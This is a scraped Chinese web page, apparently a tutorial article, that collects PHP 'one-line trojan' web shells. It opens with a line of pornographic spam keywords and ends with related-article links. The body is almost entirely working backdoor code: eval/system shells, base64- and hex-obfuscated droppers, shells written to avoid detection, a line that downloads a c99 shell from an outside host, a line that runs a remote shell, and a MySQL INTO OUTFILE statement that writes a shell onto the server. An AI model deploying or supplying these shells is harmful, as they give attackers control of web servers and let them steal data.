欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

PHP與SQL語句寫一句話木馬總結(jié)

 更新時(shí)間:2019年10月11日 14:18:20   作者:藏色散人  
在本篇文章里小編給大家整理的是關(guān)于PHP與SQL語句寫一句話木馬的相關(guān)知識(shí)點(diǎn),有需要的朋友們學(xué)習(xí)下。

一、基礎(chǔ)類的一句話--功能僅限于驗(yàn)證漏洞了,實(shí)際中非常容易被查出出來:

<?php @eval($_GET["code"])?>

<?php @system($_POST["cmd"])?>

二、編碼的替換的類型:

<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>

//會(huì)生成<?php @eval($_POST['lostwolf']);?>

 

<script language="php">@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script>

//php在html內(nèi)部的一種嵌入方式

 

<?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>

 

 

<?php

session_start();

$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);

$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>

三、其他類型:

<?php $_GET[a]($_GET[b]);?>

//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

<?php assert($_REQUEST["pass"]);?>   //菜刀連接 躲避檢測(cè) 密碼pass 

<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['pass']);?>

//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 腳本類型:php 密碼為 pass

四、下載類型:

<?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?> 

<? echo file_get_contents("..//cfg_database.php");?> //顯示某文件

<? eval ( file_get_contents("遠(yuǎn)程shell")) ?> //運(yùn)行遠(yuǎn)程shell

五、無關(guān)鍵函數(shù)類型:

<?php

$_="";

$_[+""]='';

$_="$_"."";

$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");

?>

<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

http://site/2.php?_=assert&__=eval($_POST['pass']) 密碼是pass

<?$_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>

六、補(bǔ)充知識(shí)點(diǎn):

SQL寫一句話(MySQL):

select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php"

#前面是一句話內(nèi)容 后面是絕對(duì)路徑www下的PHP文件,同理其他腳本也可以

以上就是PHP一句話木馬小結(jié)與SQL語句寫一句話木馬的詳細(xì)內(nèi)容,感謝大家的學(xué)習(xí)和對(duì)腳本之家的支持。

相關(guān)文章

  • PHPThumb PHP 圖片縮略圖庫

    PHPThumb PHP 圖片縮略圖庫

    剛上網(wǎng)搜索了一下,跟這個(gè)同名的還有另一個(gè),似乎也挺不錯(cuò)的,這個(gè)類庫是github.com上的一個(gè)開源項(xiàng)目:PHPThumb
    2012-03-03
  • PHP mail 通過Windows的SMTP發(fā)送郵件失敗的解決方案

    PHP mail 通過Windows的SMTP發(fā)送郵件失敗的解決方案

    今天調(diào)試WordPress的郵件發(fā)送功能,總是提示:SMTP server response: 501 5.5.4 Invalid Address。用telnet測(cè)試SMTP是沒有任何問題的
    2009-05-05
  • 我的php學(xué)習(xí)筆記(畢業(yè)設(shè)計(jì))

    我的php學(xué)習(xí)筆記(畢業(yè)設(shè)計(jì))

    不單是為了做畢業(yè)設(shè)計(jì),其實(shí)更多的是想學(xué)會(huì)它,能弄弄網(wǎng)站什么的,只要能做好,我覺得就是可以去學(xué),可以去嘗試的
    2012-02-02
  • php curl基本操作詳解

    php curl基本操作詳解

    怎么使用cURL的基本方法?首先修改php.ini文件的設(shè)置,找到php_curl.dll,取消下在的注釋extension=php_curl.dll,因?yàn)閜hp默認(rèn)是不開啟cURL的
    2013-07-07
  • PHP防止注入攻擊實(shí)例分析

    PHP防止注入攻擊實(shí)例分析

    這篇文章主要介紹了PHP防止注入攻擊的具體方法,實(shí)例分析了相關(guān)的字符串函數(shù)與特殊字符處理,需要的朋友可以參考下
    2014-11-11
  • PHP之COOKIE支持詳解

    PHP之COOKIE支持詳解

    建立商業(yè)站點(diǎn)或者功能比較完善的個(gè)人站點(diǎn),常常需要記錄訪問者的信息,在PHP中提供了兩種方便的手段:session和cookie功能.為了永久的保持用戶信息,則cookie是最便捷的手段.在這里我將為大家詳細(xì)的講解cookie的功能及使用方法.
    2010-09-09
  • PHP 將dataurl轉(zhuǎn)成圖片image方法總結(jié)

    PHP 將dataurl轉(zhuǎn)成圖片image方法總結(jié)

    這篇文章主要介紹了PHP 將dataurl轉(zhuǎn)成圖片image方法的相關(guān)資料,這里提供了兩種方法及實(shí)現(xiàn)方式,需要的朋友可以參考下
    2016-10-10
  • PHP實(shí)現(xiàn)遞歸無限級(jí)分類

    PHP實(shí)現(xiàn)遞歸無限級(jí)分類

    這篇文章主要介紹了PHP實(shí)現(xiàn)遞歸無限級(jí)分類的方法,具有一定的參考價(jià)值,需要的朋友可以參考下
    2015-10-10
  • PHP封裝的MSSql操作類完整實(shí)例

    PHP封裝的MSSql操作類完整實(shí)例

    這篇文章主要介紹了PHP封裝的MSSql操作類,以完整實(shí)例形式分析了php封裝的各種常用的mssql數(shù)據(jù)庫的操作,包括針對(duì)mssql數(shù)據(jù)庫的連接與增刪改查等,需要的朋友可以參考下
    2016-05-05
  • PHP經(jīng)典實(shí)用正則表達(dá)式小結(jié)

    PHP經(jīng)典實(shí)用正則表達(dá)式小結(jié)

    這篇文章主要介紹了PHP經(jīng)典實(shí)用正則表達(dá)式,結(jié)合具體實(shí)例總結(jié)分析了php基于正則實(shí)現(xiàn)驗(yàn)證、查找、匹配等相關(guān)操作技巧,需要的朋友可以參考下
    2017-05-05

最新評(píng)論